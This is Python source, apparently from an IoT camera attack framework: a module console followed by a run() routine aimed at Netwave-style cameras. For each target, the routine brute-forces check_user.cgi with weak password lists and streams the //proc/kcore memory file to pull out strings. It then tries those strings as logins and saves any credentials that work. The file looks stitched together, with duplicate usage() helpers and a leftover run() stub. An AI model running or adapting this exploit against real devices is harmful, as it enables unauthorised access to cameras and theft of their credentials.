def do_info(self, line):
    """info
    Prints module info
    """
    # `line` is unused: the command takes no arguments.
    frame = self.current_frame
    if not frame:
        # No module has been selected yet, so there is nothing to describe.
        print_utils.time_print("Select module first")
        return
    # The module's __info__ attribute is pretty-printed as-is.
    pp(frame.__info__, indent=4)
def do_run(self, line):
    """run
    Run current module
    """
    # `line` is unused: the command takes no arguments.
    frame = self.current_frame
    if frame is None:
        print_utils.time_print("Select module first")
        return
    frame.run()
    # Two blank lines separate the module output from the next prompt;
    # end="" stops print from adding a third newline.
    print("\n\n", end="")
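def do_show(self, line):
    """show {options/modules/info}
    Shows details
    """
    frame = self.current_frame
    if line == "options":
        if frame is None:
            print_utils.time_print("Select module first")
        else:
            print("")
            frame.print_options()
    elif line in ("modules", ""):
        # A bare `show` lists every module: the empty search term is passed
        # to the table builder together with the raw module array.
        print("")
        print(print_utils.get_modules_search_table("", self.modules._arr))
    elif line == "info":
        # Same guard as "options": without it, `show info` before any
        # `use` raised AttributeError on None.
        if frame is None:
            print_utils.time_print("Select module first")
        else:
            print("")
            frame.print_info()
    # Any other argument is ignored silently, as before.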
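def do_set(self, line):
    """set [option_name] [value]
    Set an option of the current module
    """
    def usage():
        print_utils.time_print(
            "Invalid number of arguments for 'set' command")
        print_utils.time_print("set command usage: set <option> <value>")

    if not self.current_frame:
        print_utils.time_print("Select module first")
        return False

    parts = line.split(" ")
    if len(parts) < 2:
        usage()
        return False

    if parts[1].startswith(config.LST_IND):
        # A value that starts with the list indicator may have been typed
        # with spaces; everything after the option name is glued back
        # together (without separators) into one value.
        parts = [parts[0], "".join(parts[1:])]
    elif len(parts) != 2:
        usage()
        return False

    opt_name, opt_set_value = parts

    # Only the first option with a matching name is ever updated.
    option = next(
        (item for item in self.current_frame._options
         if item.opt_name == opt_name),
        None,
    )
    if option is None:
        print_utils.time_print("There's no option called '%s'" % opt_name)
        return

    try:
        option.set_option_value(opt_set_value)
        print_utils.clear_screen()
    except Exception as e:
        # The option object rejected the value: show its message and fall
        # through to the options table instead of aborting the shell.
        print_utils.clear_screen()
        print("[-]", e, "\n")
    self.current_frame.print_options()
    return False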
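def do_use(self, line):
    """use {module_name/module_id}
    Use module
    """
    # Only the first word is considered; anything after it is ignored.
    requested = line.split(" ")[0]

    # By id or by name
    try:
        module_id = int(requested)
    except ValueError:
        loc_module = self.modules.by_name(requested)
        module_name = requested
    else:
        loc_module = self.modules.by_id(module_id)
        module_name = loc_module["use_name"] if loc_module else None

    if loc_module is None:
        # Report what the user typed; a failed lookup by id used to
        # print "None" here.
        print_utils.time_print("No such module like: %s" % requested)
        return False

    # Create frame
    self.current_frame = bind_frame(loc_module["handle"])()
    self.current_frame.print_options()
    self.prompt = self.format_prompt % module_name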
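def usage():
    """Print the argument-count error and the usage line for 'search'."""
    print_utils.time_print(
        "Invalid number of arguments for 'search' command")
    # The usage line used to start with "set command usage", copied from
    # the 'set' helper.
    print_utils.time_print("search command usage: search <term>")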
def usage():
    """Print the argument-count error and the usage line for 'set'."""
    messages = (
        "Invalid number of arguments for 'set' command",
        "set command usage: set <option> <value>",
    )
    for message in messages:
        print_utils.time_print(message)
def run(self):
    """Process every configured target in turn.

    Per target, as visible in this block: skip it if the database already
    holds credentials for it; optionally try a small username/password
    list against check_user.cgi; fetch the device MAC; stream the
    ``//proc/kcore`` URL and extract strings until the MAC appears; then
    try the extracted strings as credentials and save any that work.

    Returns False when option validation fails, otherwise None.
    """
    # NOTE(review): block nesting was reconstructed from a listing that had
    # lost its indentation; confirm it against the upstream file.
    if not self.validate():
        print_utils.time_print("Module run stopped")
        return False
    # init variables
    targets, ssl = self.opt_val("targets"), self.opt_val("ssl")
    protocol = "https" if ssl else "http"
    # One tuple per target: (status URL, memory-file URL, auth URL, raw
    # target string).
    # Detection note: P[1] is requested directly below; P[0] and P[2] are
    # handed to helpers that presumably request them too, so these three
    # paths are what a device or proxy HTTP log would show.
    pool = [(
        "%s://%s/get_status.cgi" % (protocol, target),
        "%s://%s//proc/kcore" % (protocol, target),
        "%s://%s/check_user.cgi" % (protocol, target),
        "%s" % (target),
    ) for target in targets]
    # Used only as the denominator of the progress percentage, which can
    # therefore exceed 100%.
    location = 10100
    # Pause, in seconds, between the dump and the credential attempts.
    sleeping = 20
    for P in pool:
        dump_results = []
        print("[>] Target:", P[3])
        string_len = 0
        # Step -1: skip if in db
        # `is True` is an identity test: a truthy non-bool result would
        # not skip the target.
        if self.db.is_camera_in_credentials(P[3]) is True:
            print("[*] Target already in database (skipping)")
            continue
        # Step 0: soft bruteforce
        if self.opt_val("brute") or self.opt_val("brute-only"):
            # NOTE(review): this unpack raises ValueError unless the target
            # has exactly one ":"; it is outside any try, so the error
            # would end the whole run.
            ip, port = P[3].split(":")
            http_discovery = HTTPStatusCodeDiscovery(ip, port)
            # presumably returns the listed paths that answered 401;
            # verify against HTTPStatusCodeDiscovery
            endpoints = http_discovery.discover(["check_user.cgi"], 401)
            if endpoints != []:
                brute_url = endpoints[0]["url"]
                print("Trying to bruteforce:", brute_url)
                soft_brute = HTTPBruteforce()
                usernames = AssetManager(
                    ["bruteforce", "easy_usernames.txt"])
                passwords = AssetManager(
                    ["bruteforce", "easy_passwords.txt"])
                results = soft_brute.http_basic_auth_bruteforce(
                    brute_url, usernames.lines(), passwords.lines(), verbose=True)
                for user, pwd in results:
                    self.save(ipport=P[3], user=user, pwd=pwd)
                if results != []:
                    print("[+] Bruteforce succeeded. Skipping this target.")
                    continue
                else:
                    # With "brute-only" set, the dump steps are never
                    # reached for this target.
                    if self.opt_val("brute-only"):
                        continue
                    print("[*] Bruteforce failed. Sleeping 10s to recover.")
                    time.sleep(10)
        # Step 1 : Get MAC
        try:
            # Stored on the instance; str(..., "utf8") below implies the
            # helper returns bytes.
            self.MAC = netwave_get_mac(P[0])
            print("Got MAC: %s" % str(self.MAC, "utf8"))
        except Exception as e:
            print("Got MAC exception:", e)
            continue
        # Step 2 : Dump
        try:
            # Streamed GET with a 7-second timeout; the body is consumed
            # in 8192-byte chunks.
            req = requests.get(P[1], stream=True, timeout=7)
            print("Status code:", req.status_code)
            print("Vulnarable:", "Yes" if req.status_code == 200 else "No")
            for chunk in req.iter_content(chunk_size=8192):
                # regex_strings returns a pair; the second item is added to
                # the running total, so it is presumably a count or length
                # (TODO confirm).
                lst, _ = strings.regex_strings(chunk)
                string_len += _
                print("\rProgress: %.2f%%\t" % ((string_len / location) * 100), end="")
                # Stop at the first chunk whose extracted strings include
                # the MAC; that chunk's strings are stored joined by b":::".
                if self.MAC in lst:
                    print("\n[+] Found location")
                    dump_results = lst
                    self.db.insert_dump(ipport=P[3], dump=b":::".join(dump_results))
                    break
            # Step 3 : Bruteforce
            if dump_results != []:
                # Drops only the local name.
                # NOTE(review): the streamed response is never closed
                # explicitly in the visible code.
                del req
                print("\nSleeping: %ss" % sleeping)
                time.sleep(sleeping)
                brute = HTTPBruteforce()
                # The de-duplicated strings serve as both the username and
                # the password candidates.
                creds = list(set(dump_results))
                results = brute.http_basic_auth_bruteforce(
                    P[2], creds, creds, verbose=True)
                for user, pwd in results:
                    self.save(ipport=P[3], user=user, pwd=pwd)
        except Exception as e:
            # Any error in the request, the streaming loop, the database
            # insert or step 3 is printed, then the loop moves on.
            print("Dump exception: ", e)
            continue
def run(self):
    # Guard: do nothing unless the module's validate() call succeeds.
    if not self.validate():
        print_utils.time_print("Module run stopped")
        return False
    # NOTE(review): the listing shows only this guard; what the module does
    # after validation is not visible here.